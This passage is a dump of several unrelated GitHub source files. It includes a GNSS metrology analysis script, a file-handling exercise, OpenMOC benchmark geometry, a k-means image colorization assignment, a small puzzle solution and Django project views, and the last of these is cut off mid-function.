+{"seq_id":"12536996446","text":"import matplotlib.pyplot as plt\nfrom pyproj import Proj, transform\nfrom pyproj import Transformer\nimport matplotlib.image as img\nimport numpy as np\n\n\n#### Grandeurs utilies\n\n# x=alpha*E +beta*N + ct1\nalpha = 0.622672164\nbeta = -0.093309478\nct1 = 546305.0875\n\n# y=gamma*E +delta*N + ct2\ngamma = -0.046338701\ndelta = -0.620534551\ncte2 = 4251139.032\n\ndef deg_to_Lamb(x1, y1):\n transformer = Transformer.from_crs(4326, 2154, always_xy=True)\n points = [(x1, y1)]\n for pt in transformer.itransform(points):\n return pt\n\n\ndef conversion_pour_image(E, N):\n x = alpha * E + beta * N + ct1\n y = gamma * E + delta * N + cte2\n return x, y\n\ndef stats_horizontal(nb_mesures, fichiers, ref, titre):\n GPA = []\n for i in range(nb_mesures):\n fich = open(fichiers[i], \"r\")\n lignes = fich.readlines()\n for ligne in lignes:\n if '$GPGGA' in ligne:\n GPA.append(ligne)\n\n liste_lat = []\n liste_long = []\n liste_Xlamb = []\n liste_Ylamb = []\n\n for mesure in GPA:\n mes = mesure.split(\",\")[2:6]\n if mes[1] == 'N':\n liste_long.append(float(mes[0][0:2]) + (float(mes[0][2:])) / 60)\n else:\n liste_long.append(-float(mes[0][0:2]) - (float(mes[0][2:])) / 60)\n if mes[3] == 'E':\n liste_lat.append(float(mes[2][0:3]) + (float(mes[2][3:])) / 60)\n else:\n liste_lat.append(-float(mes[2][0:3]) - (float(mes[2][3:])) / 60)\n\n for i in range(len(liste_lat)):\n X, Y = deg_to_Lamb(liste_lat[i], liste_long[i])\n liste_Xlamb.append(X)\n liste_Ylamb.append(Y)\n\n #moyenne des mesures\n m_x = np.mean(liste_Xlamb)\n m_y 
= np.mean(liste_Ylamb)\n    plt.plot(m_x, m_y, 'og', label='moyenne')\n    if ref == 8000:\n        x_ref, y_ref = 147787.422, 6839274.663  # 8000\n    else:\n        x_ref, y_ref = 147788.609, 6839279.724  # 9000\n\n\n    plt.plot(x_ref, y_ref, \"or\", label='réference')\n\n    for i in range(len(liste_Ylamb)):\n        plt.plot(liste_Xlamb[i], liste_Ylamb[i], \"+b\")\n    plt.title(titre)\n    plt.legend()\n\n    biais = np.sqrt((m_x-x_ref)**2+(m_y-y_ref)**2)\n    fid = np.sqrt(np.std(liste_Xlamb)**2 + np.std(liste_Ylamb)**2)\n    prec = np.sqrt(biais**2 + fid**2)\n    print('biais : ',biais, ' m') #Justesse\n    print('Fidélité : ', fid, 'm')\n    print('Précision : ', prec, 'm')\n    plt.show()\n\ndef stats_vertical(fichier1,fichier2, titre):\n    GGA1 = []\n    GGA2 = []\n    altitude1 = []\n    altitude2 = []\n    fich1 = open(fichier1, \"r\")\n    fich2 = open(fichier2, \"r\")\n    lignes1 = fich1.readlines()\n    lignes2 = fich2.readlines()\n    for ligne in lignes1:\n        if '$GPGGA' in ligne:\n            GGA1.append(ligne.split(','))\n    for ligne in lignes2:\n        if '$GPGGA' in ligne:\n            GGA2.append(ligne.split(','))\n\n    for i in range(len(GGA1)):\n        try:\n            altitude1.append(float(GGA1[i][-6]) - float(GGA1[i][-4]))\n        except:\n            pass\n    for i in range(len(GGA2)):\n        try:\n            altitude2.append(float(GGA2[i][-6]) - float(GGA2[i][-4]))\n        except:\n            pass\n\n    nb_mesures1 = len(altitude1)\n    nb_mesures2 = len(altitude2)\n    altitude1 = np.array(altitude1)\n    altitude2 = np.array(altitude2)\n\n    # stats des mesures\n    m_1 = np.mean(altitude1)\n    m_2 = np.mean(altitude2)\n    fid1 = np.std(altitude1)\n    fid2 = np.std(altitude2)\n\n    nb_mesures = max(nb_mesures1, nb_mesures2)\n    x = np.linspace(1, nb_mesures, nb_mesures)\n    plt.plot(x, m_1*np.linspace(1, 1, nb_mesures), 'r', label=fichier1)\n    plt.plot(x, m_2 * np.linspace(1, 1, nb_mesures), 'g', label= fichier2)\n    plt.plot(x, (m_1 - fid1)*np.linspace(1, 1, nb_mesures), '--r')\n    plt.plot(x, (m_1 + fid1)*np.linspace(1, 1, nb_mesures), '--r')\n    plt.plot(x, (m_2 - fid2) * np.linspace(1, 1, nb_mesures), '--g')\n    plt.plot(x, (m_2 + fid2) * np.linspace(1, 1, nb_mesures), '--g')\n\n    for i in range(nb_mesures1):\n        plt.plot(i, altitude1[i], \"+k\")\n\n    for i in range(nb_mesures2):\n        plt.plot(i, altitude2[i], \"+b\")\n    plt.title(titre)\n    plt.xlabel('mesure')\n    plt.ylabel('altitude [m]')\n    plt.legend()\n\n    print('Fidélité '+fichier1+' : ', fid1, 'm')\n    print('Fidélité '+fichier2+' : ', fid2, 'm')\n\n    plt.show()\n\n\n\nif __name__ == \"__main__\":\n    #stats_horizontal(2, (\"UV24_L_Proflex_8000.txt\", \"UV24_V_Proflex_8000.txt\"), 8000, 'Acquisition Proflex 8000')\n    stats_vertical('..\\\\files\\\\mesures_stat\\\\UE24_SP80_20210602_EB06.txt', '..\\\\files\\\\mesures_stat\\\\EB06_GSTAR_11h40.txt', 'Altitude Proflex')\n    #stats_vertical('UV24_V_GStarIV_8000.txt', 'UV24_L_Proflex_8000.txt', 'Altitude 8000')","repo_name":"CorentinGoet/Projet_Systeme_1A","sub_path":"python files/old/analyse_metrologique.py","file_name":"analyse_metrologique.py","file_ext":"py","file_size_in_byte":4626,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34987160835","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 22 19:32:18 2021\r\n\r\n@author: Caroline\r\n\"\"\"\r\n\r\n#Crear Archivo\r\n#\\n: Salto de línea\r\n#W: Escritura\r\n#A: Adiciona líneas nuevas, respeta las actuales\r\n#R: Modo de lectura\r\n\r\n#Crear Archivo\r\ndef crearArchivo():\r\n    docu=open('file.txt', 'w')\r\n    docu.close()\r\n\r\n#Escribir Archivo\r\ndef abrirArchivo():\r\n    docu=open('file.txt', 'a')\r\n    docu.write('Nana\\n')\r\n    docu.write('Coffee')\r\n    
docu.close()\r\n \r\n#Leer Archivo\r\ndef leerArchivo():\r\n docu=open('file.txt', 'r')\r\n line=docu.readline()\r\n \r\n while line != \"\":\r\n print(line)\r\n line=docu.readline()\r\n \r\n docu.close()\r\n\r\n \r\n#crearArchivo() \r\n#abrirArchivo()\r\nleerArchivo()\r\n","repo_name":"carolineprada/Python-Medium","sub_path":"open_file.py","file_name":"open_file.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4617886620","text":"import openmoc\n\n###############################################################################\n# Main Simulation Parameters\n###############################################################################\n\nopenmoc.log.set_log_level('NORMAL')\n\n\n###############################################################################\n# Creating Materials\n###############################################################################\n\nopenmoc.log.py_printf('NORMAL', 'Importing materials data from HDF5...')\n\nmaterials = openmoc.materialize.load_from_hdf5('LRA-mgxs.h5', '')\n\n\n###############################################################################\n# Creating Surfaces\n###############################################################################\n\nopenmoc.log.py_printf('NORMAL', 'Creating surfaces...')\n\nleft = openmoc.XPlane(x=-82.5)\nright = openmoc.XPlane(x=82.5)\nbottom = openmoc.YPlane(y=-82.5)\ntop = openmoc.YPlane(y=82.5)\nleft.setBoundaryType(openmoc.REFLECTIVE)\nright.setBoundaryType(openmoc.VACUUM)\nbottom.setBoundaryType(openmoc.REFLECTIVE)\ntop.setBoundaryType(openmoc.VACUUM)\n\n\n###############################################################################\n# Creating Cells and Universes\n###############################################################################\n\nopenmoc.log.py_printf('NORMAL', 'Creating cells...')\n\n# Region 1\nregion1_cell = openmoc.Cell(name='region 1')\nregion1_cell.setFill(materials['region_1'])\nregion1 = openmoc.Universe(name='region 1')\nregion1.addCell(region1_cell)\n\n# Region 2\nregion2_cell = openmoc.Cell(name='region 2')\nregion2_cell.setFill(materials['region_2'])\nregion2 = openmoc.Universe(name='region 2')\nregion2.addCell(region2_cell)\n\n# Region 3\nregion3_cell = openmoc.Cell(name='region 3')\nregion3_cell.setFill(materials['region_3'])\nregion3 = openmoc.Universe(name='region 3')\nregion3.addCell(region3_cell)\n\n# Region 4\nregion4_cell = openmoc.Cell(name='region 4')\nregion4_cell.setFill(materials['region_4'])\nregion4 = openmoc.Universe(name='region 4')\nregion4.addCell(region4_cell)\n\n# Region 5\nregion5_cell = openmoc.Cell(name='region 5')\nregion5_cell.setFill(materials['region_5'])\nregion5 = openmoc.Universe(name='region 5')\nregion5.addCell(region5_cell)\n\n# Region 5\nregion6_cell = openmoc.Cell(name='region 6')\nregion6_cell.setFill(materials['region_6'])\nregion6 = openmoc.Universe(name='region 6')\nregion6.addCell(region6_cell)\n\n# Cells\nassembly1_cell = openmoc.Cell(name='assembly 1')\nassembly2_cell = openmoc.Cell(name='assembly 2')\nassembly3_cell = openmoc.Cell(name='assembly 3')\nassembly4_cell = openmoc.Cell(name='assembly 4')\nassembly5_cell = openmoc.Cell(name='assembly 5')\nassembly6_cell = openmoc.Cell(name='assembly 6')\n\nassembly1 = openmoc.Universe(name='assembly 1')\nassembly2 = openmoc.Universe(name='assembly 2')\nassembly3 = openmoc.Universe(name='assembly 3')\nassembly4 = openmoc.Universe(name='assembly 4')\nassembly5 = openmoc.Universe(name='assembly 
5')\nassembly6 = openmoc.Universe(name='assembly 6')\n\nassembly1.addCell(assembly1_cell)\nassembly2.addCell(assembly2_cell)\nassembly3.addCell(assembly3_cell)\nassembly4.addCell(assembly4_cell)\nassembly5.addCell(assembly5_cell)\nassembly6.addCell(assembly6_cell)\n\n# Root cell/universe\nroot_cell = openmoc.Cell(name='root cell')\nroot_cell.addSurface(halfspace=+1, surface=left)\nroot_cell.addSurface(halfspace=-1, surface=right)\nroot_cell.addSurface(halfspace=+1, surface=bottom)\nroot_cell.addSurface(halfspace=-1, surface=top)\n\nroot_universe = openmoc.Universe(name='root universe')\nroot_universe.addCell(root_cell)\n\n\n###############################################################################\n# Creating Lattices\n###############################################################################\n\nopenmoc.log.py_printf('NORMAL', 'Creating LRA lattices...')\n\n# Assembly 1\nassembly1_lattice = openmoc.Lattice(name='assembly 1')\nassembly1_lattice.setWidth(width_x=1.5, width_y=1.5)\ntemplate = [[region1] * 10] * 10\nassembly1_lattice.setUniverses([template])\nassembly1_cell.setFill(assembly1_lattice)\n\n# Assembly 2\nassembly2_lattice = openmoc.Lattice(name='assembly 2')\nassembly2_lattice.setWidth(width_x=1.5, width_y=1.5)\ntemplate = [[region2] * 10] * 10\nassembly2_lattice.setUniverses([template])\nassembly2_cell.setFill(assembly2_lattice)\n\n# Assembly 3\nassembly3_lattice = openmoc.Lattice(name='assembly 3')\nassembly3_lattice.setWidth(width_x=1.5, width_y=1.5)\ntemplate = [[region3] * 10] * 10\nassembly3_lattice.setUniverses([template])\nassembly3_cell.setFill(assembly3_lattice)\n\n# Assembly 4\nassembly4_lattice = openmoc.Lattice(name='assembly 4')\nassembly4_lattice.setWidth(width_x=1.5, width_y=1.5)\ntemplate = [[region4] * 10] * 10\nassembly4_lattice.setUniverses([template])\nassembly4_cell.setFill(assembly4_lattice)\n\n# Assembly 5\nassembly5_lattice = openmoc.Lattice(name='assembly 5')\nassembly5_lattice.setWidth(width_x=1.5, width_y=1.5)\ntemplate = [[region5] * 10] * 10\nassembly5_lattice.setUniverses([template])\nassembly5_cell.setFill(assembly5_lattice)\n\n# Assembly 6\nassembly6_lattice = openmoc.Lattice(name='assembly 6')\nassembly6_lattice.setWidth(width_x=1.5, width_y=1.5)\ntemplate = [[region6] * 10] * 10\nassembly6_lattice.setUniverses([template])\nassembly6_cell.setFill(assembly6_lattice)\n\n# Full core\ncore_lattice = openmoc.Lattice(name='core')\ncore_lattice.setWidth(width_x=15.0, width_y=15.0)\n\nuniverses = {7 : assembly1, 8 : assembly2, 9: assembly3,\n 10 : assembly4, 11 : assembly5, 12 : assembly6}\ntemplate = [[12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12],\n [12, 12, 12, 12, 12, 12, 12, 12, 12, 12, 12],\n [ 9, 9, 9, 9, 9, 9, 9, 12, 12, 12, 12],\n [ 9, 9, 9, 9, 9, 9, 9, 10, 12, 12, 12],\n [ 8, 7, 7, 7, 7, 8, 8, 11, 11, 12, 12],\n [ 8, 7, 7, 7, 7, 8, 8, 11, 11, 12, 12],\n [ 7, 7, 7, 7, 7, 7, 7, 9, 9, 12, 12],\n [ 7, 7, 7, 7, 7, 7, 7, 9, 9, 12, 12],\n [ 7, 7, 7, 7, 7, 7, 7, 9, 9, 12, 12],\n [ 7, 7, 7, 7, 7, 7, 7, 9, 9, 12, 12],\n [ 8, 7, 7, 7, 7, 8, 8, 9, 9, 12, 12]]\n\nfor i in range(11):\n for j in range(11):\n template[i][j] = universes[template[i][j]]\ncore_lattice.setUniverses([template])\nroot_cell.setFill(core_lattice)\n\n\n###############################################################################\n# Creating the Geometry\n###############################################################################\n\nopenmoc.log.py_printf('NORMAL', 'Creating geometry...')\n\ngeometry = 
openmoc.Geometry()\ngeometry.setRootUniverse(root_universe)\n","repo_name":"mit-crpg/OpenMOC","sub_path":"sample-input/benchmarks/LRA/geometry.py","file_name":"geometry.py","file_ext":"py","file_size_in_byte":6707,"program_lang":"python","lang":"en","doc_type":"code","stars":135,"dataset":"github-code","pt":"53"} +{"seq_id":"26980510286","text":"# patch : 3 x 3 patch where the center pixel is the pixel we want to predict\n# representative_colors: 5 colors that represents all the color in the original image\n# grey_image: original image in a greyscaled\nimport time\nfrom collections import Counter\nfrom queue import PriorityQueue\nimport heapq\nimport numpy as np\nimport sys\nimport cv2\nimport matplotlib.pyplot as plt\nimport statistics\nfrom statistics import mode\nfrom scipy import stats\nimport random\n\ndef eclud_dist(centroid, data_pnt):\n return np.linalg.norm(centroid - data_pnt)\n\n\ndef kmeans(input):\n colors = []\n id = list(range(0, len(input)))\n datapnts = {k: v for (k, v) in zip(id, input)}\n\n cluster_dict = {}\n for x in range(1, 6):\n r = np.random.randint(255)\n g = np.random.randint(255)\n b = np.random.randint(255)\n current = np.array([r, g, b])\n previous = np.array([-1, -1, -1])\n cluster_dict[x] = []\n cluster_dict[x].append(current)\n cluster_dict[x].append(previous)\n # while the current and previous dont equal each other, just keep averaging the data pnts related to cluster\n '''for each data pnt, assign it to a centroid, then when they are assigned, calculate average for each cluster, \n and set as new centroid, check for convergence repeat'''\n final_clust_data = {}\n while not convergence(cluster_dict):\n # stores which datapnt belong to which cluster\n clust_data = {}\n\n for x in range(1, 6):\n clust_data[x] = []\n for datapnts_id in datapnts.keys():\n data = datapnts[datapnts_id]\n min_num = sys.maxsize\n min_cluster = -1\n # determine which cluster\n for key in cluster_dict.keys():\n value = cluster_dict[key]\n # print('COLOR '+str(data))\n temp = eclud_dist(value[0], data)\n if temp <= min_num:\n min_cluster = key\n min_num = temp\n clust_data[min_cluster].append(datapnts_id)\n # This is for replacing the current cluster pnt with the average of data pnts + replacing previous cluster pnt\n for key in clust_data.keys():\n value = clust_data[key]\n tmplst = []\n for data_id in value:\n tmplst.append(datapnts[data_id])\n a = tmplst\n if len(tmplst) > 0:\n average = np.mean(a, axis=0)\n # print(' Average of:' + str(a) + 'is ' + str(average))\n previous = cluster_dict[key][0]\n cluster_dict[key][0] = average\n cluster_dict[key][1] = previous\n else:\n previous = cluster_dict[key][0]\n cluster_dict[key][0] = np.array([-1, -1, -1])\n cluster_dict[key][1] = previous\n final_cluster_data = clust_data\n for key in cluster_dict.keys():\n colors.append(cluster_dict[key][0])\n print(\"finish\" + str(len(colors)))\n return colors, final_cluster_data\n\n # while not np.array_equal(previous,current):\n\n\ndef convergence(cluster_dict):\n for value in cluster_dict.values():\n if not np.array_equal(value[0], value[1]):\n return False\n return True\n\n\n# def main():\n# img = cv2.imread('imgs/left.jpg')\n# img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n# # img[0:150, 0:300] = [0, 255, 0]\n#\n# cluster_input = img.reshape((img.shape[1] * img.shape[0], 3))\n# colors, cluster_dict = kmeans(cluster_input)\n#\n# h = img.shape[0]\n# w = img.shape[1]\n# for y in range(0, h):\n# for x in range(0, w):\n# min = sys.maxsize\n# tmpcolor = [0, 0, 0]\n# for color in colors:\n# dist = 
eclud_dist(img[y, x], color)\n# if min > dist:\n# min = dist\n# tmpcolor = color\n# img[y, x] = tmpcolor\n#\n# plt.imshow(img)\n# plt.show()\n# # ///////////////////////////////////////////////////////////////////////\n# # recolor the right side of the image\n# '''\n# We analyze the greyscale of both the right and left, for each pixel on right side, take a patch surrounding\n# that pixel and find 6 patches on the left side most similar to that pixel\n# '''\n# greyR = cv2.imread('imgs/grayRight.jpg')\n# greyL = cv2.imread('imgs/grayLeft.jpg')\n# greydict = {}\n# h = greyL.shape[0]\n# w = greyL.shape[1]\n# # assign neighbors for all the leftside\n# for i in range(2, h - 1):\n# for j in range(2, w - 1, 3):\n# tmplst = [greyL[i + 1, j],\n# greyL[i - 1, j],\n# greyL[i, j + 1],\n# greyL[i, j - 1],\n# greyL[i - 1, j - 1],\n# greyL[i + 1, j - 1],\n# greyL[i - 1, j + 1],\n# greyL[i + 1, j + 1],\n# greyL[i, j]]\n# flat_list = np.array(np.concatenate(tmplst).flat)\n# greydict[(i, j)] = flat_list\n# o = greyR.shape[0]\n# p = greyR.shape[1]\n# # compute each pixel and predict color\n# for i in range(2, o - 1):\n# for j in range(2, p - 1):\n# print(i)\n# tmplst = [greyR[i + 1, j],\n# greyR[i - 1, j],\n# greyR[i, j + 1],\n# greyR[i, j - 1],\n# greyR[i - 1, j - 1],\n# greyR[i + 1, j - 1],\n# greyR[i - 1, j + 1],\n# greyR[i + 1, j + 1],\n# greyR[i, j]]\n# flat_list = np.array(np.concatenate(tmplst).flat)\n# pqe = PriorityQueue()\n# for key in greydict.keys():\n# dist = eclud_dist(flat_list, greydict[key])\n# pqe.put((dist, key))\n# clst = []\n# nclst = []\n# priolst = []\n# for x in range(6):\n# patch = pqe.get()\n# q, z = patch[1]\n# color = img[q, z]\n# clst.append(color)\n# print(color)\n# print(clst)\n# m = stats.mode(clst)\n# mode1 = m[0]\n# for x in range(len(clst)):\n# comparison = clst[x] == m[0]\n# equal_arrays = comparison.all()\n# # print(equal_arrays)\n# if not equal_arrays:\n# clst.append(clst[x])\n# y = stats.mode(nclst)\n# mode2 = y[0]\n# if y[1] == m[1]:\n# for x in range(len(clst)):\n# popped = clst.pop()\n# if popped == mode1:\n# greyR[i, j] = mode2\n# if popped == mode2:\n# greyR[i, j] = mode1\n# break\n# else:\n# greyR[i, j] = mode1\n#\n# plt.imshow(greyR)\n# plt.show()\n# lst = []\n# # lst = [np.array([0,0,0]),np.array([255,255,255]),np.array([51,51,51]),np.array([51,51,51]),np.array([51,51,51]),np.array([51,51,51]),np.array([102,102,102]),np.array([153,153,153]),np.array([0,0,153]),np.array([0,0,153]),np.array([0,0,153])]\n# # m = stats.mode(lst)\n# # flat_list = np.array(np.concatenate(m[0]).flat)\n# # # print(flat_list)\n# # nlst = []\n# # # for arr in lst:\n# # # print(arr)\n# # # comparison = arr == m[0]\n# # # # print(comparison)\n# # # equal_arrays = comparison.all()\n# # # print(equal_arrays)\n# # # # if not equal_arrays:\n# # # # lst.append(arr)\n# # for x in range(len(lst)):\n# # comparison = lst[x] == m[0]\n# # equal_arrays = comparison.all()\n# # # print(equal_arrays)\n# # if not equal_arrays:\n# # nlst.append(lst[x])\n# # y = stats.mode(nlst)\n#\n# # for x in range(10):\n# # lst.append(np.random.randint(low=0, high=255, size=3))\n# # print(lst)\n# # print(kmeans(lst))\n\ndef get_patches(img):\n patches=[]\n #iterate through grayleft\n #iterate through rows\n for i in range(1,len(img)-1):\n #iterate through columns\n for j in range(1,len(img[0])-1):\n patches.append((img[i-1:i+2,j-1:j+2],(i,j)))\n\n return patches\ndef main():\n img = cv2.imread('imgs/left.jpg')\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n # img[0:150, 0:300] = [0, 255, 0]\n\n cluster_input = 
img.reshape((img.shape[1] * img.shape[0], 3))\n    img2 = cv2.imread('imgs/right.jpg')\n    img2 = cv2.cvtColor(img2, cv2.COLOR_BGR2RGB)\n    colors, cluster_dict = kmeans(cluster_input)\n\n    h = img.shape[0]\n    w = img.shape[1]\n    for y in range(0, h):\n        for x in range(0, w):\n            min = sys.maxsize\n            tmpcolor = [0, 0, 0]\n            for color in colors:\n                dist = eclud_dist(img[y, x], color)\n                if min > dist:\n                    min = dist\n                    tmpcolor = color\n            img[y, x] = tmpcolor\n\n    h = img2.shape[0]\n    w = img2.shape[1]\n    for y in range(0, h):\n        for x in range(0, w):\n            min = sys.maxsize\n            tmpcolor = [0, 0, 0]\n            for color in colors:\n                dist = eclud_dist(img2[y, x], color)\n                if min > dist:\n                    min = dist\n                    tmpcolor = color\n            img2[y, x] = tmpcolor\n    plt.imshow(combine(img,img2))\n    plt.show()\n\n    # ///////////////////////////////////////////////////////////////////////\n    # recolor the right side of the image\n    '''\n    We analyze the greyscale of both the right and left, for each pixel on right side, take a patch surrounding\n    that pixel and find 6 patches on the left side most similar to that pixel\n    '''\n    greyR = cv2.imread('imgs/grayRight.jpg')\n    greyL = cv2.imread('imgs/grayLeft.jpg')\n    greyLp = get_patches(greyL)\n\n    for i in range(1, len(greyR) - 1):\n        # iterate through columns\n        for j in range(1, len(greyR[0]) - 1):\n            print(i)\n            patch = greyR[i - 1:i + 2, j - 1:j + 2]\n            samples = random.sample(list(greyLp), 1000)\n            pqe = PriorityQueue()\n            for sample in samples:\n                dist = eclud_dist(sample[0], greyR[i - 1:i + 2, j - 1:j + 2])\n                pqe.put((dist,sample[1]))\n            closestNeighbor = []\n            for x in range(6):\n                popped = pqe.get()\n                closestNeighbor.append(popped)\n            # print(closestNeighbor)\n            cl = []\n            for patch in closestNeighbor:\n                x, y = patch[1]\n                color = img[x,y]\n                cl.append(color)\n            mode1 = stats.mode(cl)\n            mode1color = mode1[0]\n            print(\"mode1 =\" + str(mode1))\n            nlst = []\n            for patch in closestNeighbor:\n                x, y = patch[1]\n                color = img[x, y]\n                comparison = color == mode1color\n                equal_arrays = comparison.all()\n                if not equal_arrays:\n                    nlst.append(color)\n            mode2 = stats.mode(nlst)\n            mode2color = mode2[0]\n            print(\"cnt of mode1\"+ str(mode1[1])+\"\\tcnt of mode2:\" +str(mode2[1]))\n            if len(mode2[1]) > 0:\n                cnt1 = np.array(np.concatenate(mode1[1]).flat)\n                cnt2 = np.array(np.concatenate(mode2[1]).flat)\n\n                comp = cnt1 == cnt2\n                e = comp.all()\n                print(e)\n                if e:\n                    while closestNeighbor:\n                        popped = closestNeighbor.pop()\n                        x, y = popped[1]\n                        popped_color = img[x, y]\n                        if (popped_color == mode1color).all():\n                            greyR[i,j] = mode2color\n                            break\n                        if (popped_color == mode2color).all():\n                            greyR[i,j] = mode1color\n                else:\n                    greyR[i,j] = mode1color\n\n    plt.imshow(combine(img,greyR))\n    plt.show()\n    calculatediff(img2,greyR)\n\ndef combine(left,right):\n    combined = []\n    for i in range(0, len(left)):\n        combined.append(list(left[i]) + list(right[i]))\n    return combined\n\ndef calculatediff(img,predicted_image):\n    numPixel = len(img)*len(img[1])\n    correct = 0\n    for i in range(0,len(img)):\n        for j in range(0,len(img[1])):\n            comparison = img[i,j] == predicted_image[i,j]\n            equal_arrays = comparison.all()\n            if equal_arrays:\n                correct +=1\n    print(str(1-(correct/numPixel))+\" error rate\")\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"al1168/AI_Colorization","sub_path":"basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":12603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35158718337","text":"def solution(n,a,b):\n    answer = 0\n    a=a-1\n    b=b-1\n    while a//2!=b//2:\n        a=a//2\n        b=b//2\n        answer+=1\n    answer+=1\n    return 
answer","repo_name":"yooooonzzzzzang/Algo_seed","sub_path":"프로그래머스/lv2/12985. 예상 대진표/예상 대진표.py","file_name":"예상 대진표.py","file_ext":"py","file_size_in_byte":157,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42661698615","text":"import simplejson\nimport os\n\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.contrib.markup.templatetags.markup import restructuredtext\nfrom django.core.urlresolvers import reverse\nfrom django.conf import settings\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.shortcuts import get_object_or_404, render_to_response, redirect\nfrom django.template import RequestContext\nfrom django.template.defaultfilters import linebreaks\nfrom django.template.loader import render_to_string\nfrom django.views.generic.list_detail import object_list\n\nfrom projects import constants\nfrom projects.forms import FileForm, CreateProjectForm, ImportProjectForm, FileRevisionForm\nfrom projects.models import Project, File\n\nfrom bookmarks.models import Bookmark\n\n\n@login_required\ndef project_dashboard(request):\n \"\"\"\n A dashboard! If you aint know what that means you aint need to.\n Essentially we show you an overview of your content.\n \"\"\"\n marks = Bookmark.objects.filter(user=request.user)[:5]\n return object_list(\n request,\n queryset=request.user.projects.live(),\n page=int(request.GET.get('page', 1)),\n template_object_name='project',\n extra_context={'bookmark_list': marks },\n template_name='projects/project_dashboard.html',\n )\n\n@login_required\ndef project_manage(request, project_slug):\n \"\"\"\n The management view for a project, where you will have links to edit\n the projects' configuration, edit the files associated with that\n project, etc.\n \"\"\"\n project = get_object_or_404(request.user.projects.live(), slug=project_slug)\n return object_list(\n request,\n queryset=project.files.live(),\n extra_context={'project': project},\n page=int(request.GET.get('page', 1)),\n template_object_name='file',\n template_name='projects/project_manage.html',\n )\n\n@login_required\ndef project_create(request):\n \"\"\"\n The view for creating a new project where the docs will be hosted\n as objects and edited through the site\n \"\"\"\n form = CreateProjectForm(request.POST or None)\n\n if request.method == 'POST' and form.is_valid():\n form.instance.user = request.user\n project = form.save()\n project_manage = reverse('projects_manage', args=[project.slug])\n return HttpResponseRedirect(project_manage)\n\n return render_to_response(\n 'projects/project_create.html',\n {'form': form},\n context_instance=RequestContext(request)\n )\n\n@login_required\ndef project_edit(request, project_slug):\n \"\"\"\n Edit an existing project - depending on what type of project is being\n edited (created or imported) a different form will be displayed\n \"\"\"\n project = get_object_or_404(request.user.projects.live(), slug=project_slug)\n\n if project.is_imported:\n form_class = ImportProjectForm\n else:\n form_class = CreateProjectForm\n\n form = form_class(instance=project, data=request.POST or None)\n\n if request.method == 'POST' and form.is_valid():\n form.save()\n project_dashboard = reverse('projects_manage', args=[project.slug])\n return HttpResponseRedirect(project_dashboard)\n\n return render_to_response(\n 'projects/project_edit.html',\n {'form': form, 'project': project},\n context_instance=RequestContext(request)\n 
)\n\n@login_required\ndef project_delete(request, project_slug):\n    \"\"\"\n    Mark a project as deleted on POST, otherwise show a form asking for\n    confirmation of delete.\n    \"\"\"\n    project = get_object_or_404(request.user.projects.live(), slug=project_slug)\n\n    if request.method == 'POST':\n        project.status = constants.DELETED_STATUS\n        project.save()\n        project_dashboard = reverse('projects_dashboard')\n        return HttpResponseRedirect(project_dashboard)\n\n    return render_to_response(\n        'projects/project_delete.html',\n        {'project': project},\n        context_instance=RequestContext(request)\n    )\n\n@login_required\ndef project_import(request):\n    \"\"\"\n    Import docs from a repo\n    \"\"\"\n    form = ImportProjectForm(request.POST or None)\n\n    if request.method == 'POST' and form.is_valid():\n        form.instance.user = request.user\n        project = form.save()\n        project_manage = reverse('projects_manage', args=[project.slug])\n        return HttpResponseRedirect(project_manage + '?docs_not_built=True')\n\n    return render_to_response(\n        'projects/project_import.html',\n        {'form': form},\n        context_instance=RequestContext(request)\n    )\n\n@login_required\ndef file_add(request, project_slug):\n    \"\"\"\n    Add a file to a project, redirecting on success to the projects mgmt page\n    \"\"\"\n    project = get_object_or_404(request.user.projects.live(), slug=project_slug)\n    file = File(project=project)\n\n    form = FileForm(instance=file, data=request.POST or None)\n\n    if request.method == 'POST' and form.is_valid():\n        form.instance.project = project\n        file = form.save()\n        project_manage = reverse('projects_manage', args=[project.slug])\n        return HttpResponseRedirect(project_manage)\n\n    return render_to_response(\n        'projects/file_add.html',\n        {'form': form, 'project': project},\n        context_instance=RequestContext(request)\n    )\n\n@login_required\ndef file_edit(request, project_slug, file_id):\n    \"\"\"\n    Edit an existing file\n    \"\"\"\n    project = get_object_or_404(request.user.projects.live(), slug=project_slug)\n    file = get_object_or_404(project.files.live(), pk=file_id)\n\n    form = FileForm(instance=file, data=request.POST or None)\n\n    if request.method == 'POST' and form.is_valid():\n        form.save()\n        project_manage = reverse('projects_manage', args=[project.slug])\n        return HttpResponseRedirect(project_manage)\n\n    return render_to_response(\n        'projects/file_edit.html',\n        {'form': form, 'project': project, 'file': file},\n        context_instance=RequestContext(request)\n    )\n\n@login_required\ndef file_delete(request, project_slug, file_id):\n    \"\"\"\n    Mark a given file as deleted on POST, otherwise ask for confirmation\n    \"\"\"\n    project = get_object_or_404(request.user.projects.live(), slug=project_slug)\n    file = get_object_or_404(project.files.live(), pk=file_id)\n\n    if request.method == 'POST':\n        file.status = constants.DELETED_STATUS\n        file.save()\n        project_manage = reverse('projects_manage', args=[project.slug])\n        return HttpResponseRedirect(project_manage)\n\n    return render_to_response(\n        'projects/file_delete.html',\n        {'project': project, 'file': file},\n        context_instance=RequestContext(request)\n    )\n\n@login_required\ndef file_history(request, project_slug, file_id):\n    \"\"\"\n    A view that provides diffing from current to any revision, and when\n    posted to allows you to revert\n    \"\"\"\n    project = get_object_or_404(request.user.projects.live(), slug=project_slug)\n    file = get_object_or_404(project.files.live(), pk=file_id)\n\n    form = FileRevisionForm(file, request.POST or None)\n\n    if request.method == 'POST' and form.is_valid():\n        
